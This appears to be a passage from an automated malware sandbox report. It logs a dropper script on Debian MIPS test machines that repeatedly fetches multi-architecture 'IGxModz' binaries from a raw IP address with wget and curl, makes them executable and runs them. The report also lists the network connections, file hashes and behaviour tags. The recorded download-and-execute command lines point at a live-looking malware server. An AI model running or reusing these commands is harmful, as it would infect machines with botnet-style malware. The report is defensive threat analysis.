[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA x86]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.mips]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.mips]

/bin/cat

[cat IGxModz.mips]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA mips]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.mpsl]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.mpsl]

/bin/cat

[cat IGxModz.mpsl]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA mpsl]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm4]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm4]

/bin/cat

[cat IGxModz.arm4]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA arm4]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm5]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm5]

/bin/cat

[cat IGxModz.arm5]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA arm5]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm6]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm6]

/bin/cat

[cat IGxModz.arm6]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA arm6]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm7]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm7]

/bin/cat

[cat IGxModz.arm7]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA arm7]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.ppc]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.ppc]

/bin/cat

[cat IGxModz.ppc]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA ppc]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.m68k]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.m68k]

/bin/cat

[cat IGxModz.m68k]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA m68k]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.sh4]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.sh4]

/bin/cat

[cat IGxModz.sh4]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]

/tmp/3AvA

[./3AvA sh4]

Network

Country Destination Domain Proto
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp

Files

/tmp/IGxModz.x86

MD5 960b4fa9d5383373f0a1ea04929df01b
SHA1 f78054d817db7742162a706b5d9f1fedcdf21140
SHA256 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a
SHA512 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-21 08:50

Reported

2024-11-21 08:54

Platform

debian9-mipsel-20240418-en

Max time kernel

28s

Max time network

29s

Command Line

[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A (identical entry repeated 10 times)

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/cat N/A
N/A N/A /tmp/3AvA N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3AvA /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh N/A
File opened for modification /tmp/IGxModz.arm4 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm7 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.ppc /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.sh4 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.x86 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.mips /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.mpsl /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm5 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm6 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.m68k /usr/bin/curl N/A

Processes

/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh

[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.x86]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.x86]

/bin/cat

[cat IGxModz.x86]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA x86]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.mips]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.mips]

/bin/cat

[cat IGxModz.mips]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA mips]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.mpsl]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.mpsl]

/bin/cat

[cat IGxModz.mpsl]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA mpsl]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm4]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm4]

/bin/cat

[cat IGxModz.arm4]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA arm4]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm5]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm5]

/bin/cat

[cat IGxModz.arm5]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA arm5]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm6]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm6]

/bin/cat

[cat IGxModz.arm6]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA arm6]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm7]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm7]

/bin/cat

[cat IGxModz.arm7]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA arm7]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.ppc]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.ppc]

/bin/cat

[cat IGxModz.ppc]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA ppc]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.m68k]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.m68k]

/bin/cat

[cat IGxModz.m68k]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA m68k]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.sh4]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.sh4]

/bin/cat

[cat IGxModz.sh4]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]

/tmp/3AvA

[./3AvA sh4]

Network

Country Destination Domain Proto
NL 154.213.189.14:80 154.213.189.14 tcp (identical entry repeated 20 times)

Files

/tmp/IGxModz.x86

MD5 960b4fa9d5383373f0a1ea04929df01b
SHA1 f78054d817db7742162a706b5d9f1fedcdf21140
SHA256 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a
SHA512 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f